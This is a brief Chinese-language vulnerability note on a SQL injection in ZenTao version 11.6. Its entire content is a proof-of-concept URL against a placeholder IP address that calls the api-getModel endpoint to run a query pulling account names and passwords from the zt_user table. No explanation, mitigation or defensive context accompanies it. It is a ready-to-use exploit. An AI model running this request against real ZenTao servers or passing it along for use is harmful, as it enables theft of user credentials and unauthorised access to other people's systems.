禅道 11.6版本 SQL注入漏洞

POC

http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user